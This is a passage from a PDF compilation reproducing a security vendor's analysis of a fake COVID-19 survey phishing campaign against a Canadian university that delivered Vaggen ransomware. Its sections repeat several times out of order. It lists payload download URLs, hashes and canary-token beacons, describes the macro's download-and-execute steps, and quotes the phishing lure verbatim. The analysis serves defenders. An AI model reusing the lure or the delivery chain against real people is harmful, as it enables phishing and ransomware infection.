3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2059 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2060 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2061 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2062 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2063 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2064 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2065 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2066 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2067 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2068 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2069 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2070 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2071 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2072 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2073 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2074 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2075 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2076 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2077 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2078 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2079 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2080 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2081 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2082 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2083 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2084 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2085 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2086 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2087 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2088 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2089 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2090 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2091 of 